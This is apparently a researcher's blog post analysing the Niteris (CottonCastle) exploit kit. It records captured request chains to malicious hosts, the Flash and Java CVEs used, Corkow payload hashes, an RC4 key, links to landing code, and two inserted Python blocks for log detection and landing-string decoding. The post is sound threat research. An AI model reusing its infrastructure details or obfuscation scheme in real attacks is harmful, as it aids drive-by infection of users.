2014-06-09 - Study
Meet Niteris EK (formerly known as CottonCastle)
Pamukkale (source image: sina.com) |
<Edit: 2014-07-13>
On the redirector to CottonCastle :
2014-07-13 - "CottonCastle - realname Niteris ;)" |
Thanks for that.
So Plague in Latin it seems.
</edit>
Thanks to an independent researcher from Russia who shared some referer driving to an Exploit Kit on tcp 27005, I was able to meet again the "Unknown EK" that was first spotted by EKWatcher in September 2013.
The pattern for this EK looked like :
Custom TDS then CottonCastle - 2013-09-16 from GB |
GET http://alabamarog.socket-render.info:5125/h2x/3/a627d480c37cfaf6f3634150496340ed/http%3A%2F%2Fgoo.gl%2FoYb4sq
207 Multi-Status (text/html)
GET http://alabamarog.socket-render.info:5125/h2p/3/BG/f444ab1cfeb2945d149c03508367776f.dts
200 OK (application/octed-stream)
GET http://alabamarog.socket-render.info:5125/h2i/3/BG/c708c60762f6a35c5fce213eb840ce51
200 OK (application/octed-stream)
GET http://alabamarog.socket-render.info:5125/callme?r=111
200 OK (text/html)
------------------------------------------
OT: that infection chain was really interesting.
Out of Topic 1 : the redirecting js on the compromised website is quite interesting
js ( http://pastebin.com/T4RLpFuN 2014-06-05) in front of the first TDS seems to give a weight to the event and will fire only for IE and Firefox. Not sure how effective this is (I mean compared to a basic onmousemove). Reference to Justin Bourque. Reload: 2014-06-06 http://pastebin.com/XeHfVTKU Reference now to "Michelle reporter" |
Out of Topic 2 : the first TDS will drive you to Angler EK from US :
Angler EK after first TDS in US |
and from DE in some case:
Angler EK after first TDS in DE (in the night). By day it was redirecting to CottonCastle. Fully working on the 2014-06-05 but 409 on the 2014-06-06 |
Suricata with ET rules alerts on traffic generated by 6f56f55c38be1cdad7ca498f4e93e219 |
First TDS redirecting to both CottonCastle's TDS and Nuclear Pack From Russia 2014-06-06 |
Now back to CottonCastle.
------------------------------------------
The pattern did not change that much; it now looks like :
2 TDS then CottonCastle 2014-06-05 from DE. Note the c.hit.ua counter both on the second TDS and in the landing. Note the reversed 2-letter country code in many calls. |
There are points that I have trouble explaining.
The day after, the counter had disappeared and the Exploit Kit seemed not to reply to hosts from RU/UA. Really strange when we see what those counters were like on the 5th :
Distribution of Countries hitting the Exploit Kit landing 2014-06-05 |
Distribution of OS hitting the Exploit Kit landing 2014-06-06 |
One month of stats on the counter that was associated with the landing 2014-06-05 (note...EK is not associated with that counter right now) |
Now let's see how this Exploit Kit is "weaponized".
CottonCastle : CVE-2013-0634
Successful pass for CVE-2013-0634 in CottonCastle (from CA) 2014-06-06 (post shellcode call missing here) |
GET http://afasaq.jax-updates .pw:4433/forum/view/3/494f2e325d7efeaa894484780954a500/http%3A%2F%2Fherites.in%2Ffeeling%2Ffdhsasfetgfvsaxa%2F
203 Non-Authoritative Information (text/html)
Part of CottonCastle landing (full here : http://pastebin.com/k3nuNY5M) tied to the flash exploit |
200 OK (application/x-shockwave-flash)
ecf01774b7632eb9c62d862d95570401 CVE-2013-0634
The day before it was : c224580e17d8bd4c251da29ea8bef647
GET http://afasaq.jax-updates .pw:4433/forum/advertisement/3/AC/464feda74d209abca9a05f244f4d7f3e
200 OK (text/html) ( detailed in CVE-2013-2465 pass)
GET http://afasaq.jax-updates .pw:4433/forum/torrents/3/AC/37e8ccf9bf7a70d40d877bb592bd788a
200 OK (application/x-bittorrent) Decrypted payload : 953bf448637203cec92ea2d605a47d0c Payload is Corkow (Thx Denis Laskov )
Host IP:
62.113.208.7
47447 | 62.113.192.0/18 | TTM | DE | 23MEDIA.EU | 23MEDIA GMBH
CottonCastle : CVE-2014-0515
It's the first time I have seen it in an Exploit Kit.
CVE-2014-0515 firing in CottonCastle from DE 2014-06-05 - Flash 13.0.0.182 |
GET http://ajigin.iam-updates .pw:4433/forum/view/3/f2fdfed9c68b57f0ce6427defab7aa08/http%3A%2F%2Fherites.in%2Ffeeling%2Ffdhsasfetgfvsaxa%2F
203 Non-Authoritative Information (text/html)
GET http://ajigin.iam-updates .pw:4433/forum/tracker/3/ED/333f38dc127936ab62ca5ce517c1ccd0/346.343.343.481/
200 OK (application/x-shockwave-flash) 180e226457d9370ba590ca2a722e446f
GET http://ajigin.iam-updates .pw:4433/forum/advertisement/3/ED/4babaee37c31c47fe9dadc004f7a8732
200 OK (text/html) ( detailed in CVE-2013-2465 pass)
GET http://ajigin.iam-updates .pw:4433/forum/torrents/3/ED/277ff652f2cb92471a6abfd2a5f26341
200 OK (application/x-bittorrent) Decrypted payload 7773524265ed5409938950bfc7fca574 (same day I also got: 7794934b674a07d42b0e20a6acd49039 ) Again Payload is Corkow (Thx Denis Laskov )
GET http://ajigin.iam-updates .pw:4433/forum/posting/111/
409 Conflict (text/html)
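The request sequence above (landing with the URL-encoded referer, exploit and payload fetches tagged with a reversed country code, then the /forum/posting/ callback) is regular enough to match in proxy logs. The following checker is an added example, not code from the post or from EKWatcher; the path shapes are inferred only from the captures shown here, the log format and client IPs are constructed, and the hosts and paths are taken from this post.

```python
import re
from urllib.parse import unquote, urlparse

# Path shapes inferred only from the captures in this post (assumed to hold elsewhere):
# landing = 32-hex token + URL-encoded referer, later stages = reversed 2-letter
# country code + 32-hex token, callback after payload execution = /forum/posting/<n>/.
LANDING = re.compile(r"^/forum/view/3/([0-9a-f]{32})/(https?%3A%2F%2F.+)$")
STAGE = re.compile(r"^/forum/(\w+)/3/([A-Z]{2})/([0-9a-f]{32})(?:\.\w+)?/?(?:[\d.]+/)?$")
CALLBACK = re.compile(r"^/forum/posting/\d+/$")
STAGES = {"tracker": "flash exploit", "profile": "java landing", "topic": "jar exploit",
          "advertisement": "vbs stage", "torrents": "payload"}

def classify(url):
    """Map one requested URL to a Niteris stage dict, or None when it does not match."""
    path = urlparse(url).path
    if m := LANDING.match(path):
        return {"stage": "landing", "token": m[1], "referer": unquote(m[2])}
    if (m := STAGE.match(path)) and m[1] in STAGES:
        return {"stage": STAGES[m[1]], "country": m[2][::-1], "token": m[3]}
    if CALLBACK.match(path):
        return {"stage": "callback"}
    return None

def scan(log_lines):
    """Return (client, stage) for each matching line of a 'timestamp client url' log."""
    hits = []
    for line in log_lines:
        _ts, client, url = line.split()
        if info := classify(url):
            hits.append((client, info["stage"]))
    return hits

def infected(log_lines):
    """Clients that fetched a payload and then hit the callback: treat as compromised."""
    got_payload, out = set(), set()
    for client, stage in scan(log_lines):
        if stage == "payload":
            got_payload.add(client)
        elif stage == "callback" and client in got_payload:
            out.add(client)
    return out

# Constructed proxy log (timestamp, client, URL); hosts and paths come from this post.
SAMPLE_LOG = [
    "2014-06-05T09:00:01 10.0.0.5 http://ajigin.iam-updates.pw:4433/forum/view/3/f2fdfed9c68b57f0ce6427defab7aa08/http%3A%2F%2Fherites.in%2Ffeeling%2Ffdhsasfetgfvsaxa%2F",
    "2014-06-05T09:00:02 10.0.0.5 http://ajigin.iam-updates.pw:4433/forum/tracker/3/ED/333f38dc127936ab62ca5ce517c1ccd0/346.343.343.481/",
    "2014-06-05T09:00:03 10.0.0.5 http://ajigin.iam-updates.pw:4433/forum/torrents/3/ED/277ff652f2cb92471a6abfd2a5f26341",
    "2014-06-05T09:00:09 10.0.0.5 http://ajigin.iam-updates.pw:4433/forum/posting/111/",
    "2014-06-05T09:00:10 10.0.0.7 http://example.com/forum/view/3/index.html",
]
```

The referer recovered from the landing URL tells you which compromised site sent the victim in, and a callback following a payload fetch is the strongest indicator that the dropped Corkow sample actually ran.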
CottonCastle : CVE-2013-2465
CottonCastle firing code exploiting CVE-2013-2465 to java6u45 2014-06-06 |
GET http://abuzuc.jax-updates .pw:4433/forum/view/3/f379a32d59f0fe08d75cecbb9b12b558/http%3A%2F%2Fherites.in%2Ffeeling%2Ffdhsasfetgfvsaxa%2F
203 Non-Authoritative Information (text/html)
Part of the landing tied to that exploit (full here : http://pastebin.com/Spv9TYvd ) |
Note : "OrbitWhite" is the RC4 key for the rc function in the jar file.
Session after Hex2bin and rc4 decryption : http://abuzuc.jax-updates.pw:4433/forum/advertisement/3/AC/b87f6bc7ee855098e825312e151cc54c
GET http://abuzuc.jax-updates .pw:4433/forum/profile/3/AC/874a6ece58907e1f46934ea503aede0d.djvu
200 OK (text/html)
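The "Hex2bin and rc4 decryption" step that recovers the next-stage URL from the landing, as an added example (not the post's or EKWatcher's routine): the key "OrbitWhite" and the recovered URL are from this post, while the hex blob is constructed here by re-encoding that URL with the same key, because the post does not reproduce the raw blob from the landing page.

```python
# Key named in the post for the jar's rc function; the ciphertext below is constructed.
KEY = b"OrbitWhite"

def rc4(key: bytes, data: bytes) -> bytes:
    """Textbook RC4 (KSA + PRGA). Encrypting and decrypting are the same operation."""
    S = list(range(256))
    j = 0
    for i in range(256):                       # key-scheduling algorithm
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for c in data:                             # pseudo-random generation + XOR
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(c ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)

def decode_landing_string(hex_blob: str, key: bytes = KEY) -> str:
    """The post's two steps: hex2bin, then RC4 with the key found in the jar."""
    return rc4(key, bytes.fromhex(hex_blob)).decode("latin-1")

def encode_landing_string(plain: str, key: bytes = KEY) -> str:
    """Inverse transform, used here only to build the constructed sample blob below."""
    return rc4(key, plain.encode("latin-1")).hex()

# Constructed sample: the URL recovered in the post, re-encoded with the same key
# (the post does not reproduce the raw hex blob from the landing page).
RECOVERED_URL = "http://abuzuc.jax-updates.pw:4433/forum/advertisement/3/AC/b87f6bc7ee855098e825312e151cc54c"
SAMPLE_HEX = encode_landing_string(RECOVERED_URL)

if __name__ == "__main__":
    print(decode_landing_string(SAMPLE_HEX))
```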
jnlp 2014-06-06 http://pastebin.com/FNQgEbrt |
GET http://abuzuc.jax-updates .pw:4433/forum/topic/3/AC/c94043e9a1ef9b59b382d5803fa3dadd.mkv
200 OK (application/octed-stream) Exploit for CVE-2013-2465
The java dropped to jre6u45 is nice :) |
java.dll : d.dat : 279f500d9d3aff957ff9e67ffd5165ed
j.js : http://pastebin.com/0GXycyMS
GET http://abuzuc.jax-updates .pw:4433/forum/advertisement/3/AC/b87f6bc7ee855098e825312e151cc54c
200 OK (text/html) http://pastebin.com/JrTXX5eF
Contains a vbs script (note the security product process names) |
GET http://abuzuc.jax-updates .pw:4433/forum/torrents/3/AC/7dc49f51e16116534357d5918c33a29a
200 OK (application/x-bittorrent) Decoded payload f2788007f8b27dedac15aca71d0bf8f2 Corkow
Once again I blocked the payload execution, but if infected you should get :
Call back to EK once payload is executed |
GET abuzuc.jax-updates .pw:4433/forum/posting/111/
409 Conflict (text/html)
CottonCastle : CVE-2013-0422
I won't go into as much detail as I did for CVE-2013-2465, but it's the same approach.
GET http://bzycok.key-updates .pw:4433/forum/view/3/8216ed0f457b3ac54ca52cd13383fe25/http%3A%2F%2Fleveloped.in%2Fgovernment%2F70d83bde3d5f7e09%2F
203 Non-Authoritative Information (text/html)
GET http://bzycok.key-updates .pw:4433/forum/profile/3/LN/0d240529777cb6a302fdbbc437633a3d.djvu
200 OK (text/html)
GET http://bzycok.key-updates .pw:4433/forum/topic/3/LN/5453f6a894b378e19e5af7cce177803c.mkv
200 OK (application/octed-stream) 4724436c4f4a0d3406142b8cb9bee3c3
Piece of CVE-2013-0422 in CottonCastle 2014-06-06 |
GET http://bzycok.key-updates .pw:4433/forum/advertisement/3/LN/54642665c1bd63f868f64db861c8a953
200 OK (text/html) Encoded VBS
GET http://bzycok.key-updates .pw:4433/forum/topic/3/LN/5453f6a894b378e19e5af7cce177803c.mkv
409 Conflict (text/html)
200 OK (application/x-bittorrent) < Decoded Payload : 22e98a119b8e0f1c0616fd7e377d0ec6 same family as previous.
GET http://bzycok.key-updates .pw:4433/forum/posting/111/
409 Conflict (text/html)
CottonCastle : CVE-2013-2460
Once again I won't go into as much detail as I did for CVE-2013-2465, but it's the same approach.
GET http://bkysur.key-updates .pw:4433/forum/view/3/22bd553e598f5b43b7cfee1ee2630080/http%3A%2F%2Fleveloped.in%2Fgovernment%2F70d83bde3d5f7e09%2F
203 Non-Authoritative Information (text/html)
GET http://bkysur.key-updates .pw:4433/forum/profile/3/AC/bbce0e49bfc08250668441d0b80b7a63.djvu
200 OK (text/html)
GET http://bkysur.key-updates .pw:4433/forum/topic/3/AC/f2fe8bbc9c621e65a054598f8109a9a3.mkv
200 OK (application/octed-stream) be66263cd1524b72423c0b5ec8094113
GET http://bkysur.key-updates .pw:4433/forum/topic/3/AC/f2fe8bbc9c621e65a054598f8109a9a3.mkv
409 Conflict (text/html)
GET http://bkysur.key-updates .pw:4433/forum/advertisement/3/AC/540ff821785fd90aeed5e30ee351a6c9
200 OK (text/html) Encoded VBS
GET http://bkysur.key-updates .pw:4433/forum/torrents/3/AC/bc5215485d8c485b2b277a5f569a6bad
200 OK (application/x-bittorrent)
GET http://bkysur.key-updates .pw:4433/forum/posting/111/
409 Conflict (text/html)
I may update this post later once I face it.
CVE-2013-2460 in CottonCastle : 2 |
CVE-2013-2460 in CottonCastle 2014-06-06 |
CottonCastle : CVE-2013-2551:
This CVE has been captured by Set_Abominae, covered by Malwageddon and identified by regenpijp1. I may update this post later once I face it.
Todo :
CVE-2011-3544 ?? -- Didn't have the opportunity to check the EK with Java6 < 27 or at least < 18.
AV process name callback test.
CVE-2013-2551 path.
Exploitation Graph :
This Exploit Kit is not widely used (maybe only by the operators of the Corkow botnet, and the 2nd TDS).
Files: Here
[Edit]
Niteris Exploit Kit Screenshot : Source Group-IB (page 10 of this report (PDF) on buhtrap ) |
[/Edit]
Credits : Thanks Timo Hirvonen for confirming the 2 Flash CVEs, and Arseny Levin for defining the CVE-2013-2460. Thanks to EKWatcher for the rc4 decryption routine. Thanks Will Metcalf for many inputs. And warm thanks to the "independent researcher from Russia" for the Referer. Thanks Denis Laskov for identifying the payload.
Read more :
CottonCastle EK: "I hate to break this to you, but this isn't gonna be an open casket." - 2014-04-08 - Malwageddon
Corkow: Analysis of a business-oriented banking Trojan - 2014-02-27 - Robert Lipovsky - Eset
Post-publication reading :
APT-style bank robberies increase with Metel, GCMAN and Carbanak 2.0 attacks - 2016-02-08 - TheSecureList
Another look at Niteris : post exploitation WMI and Fiddler checks - 2015-05-12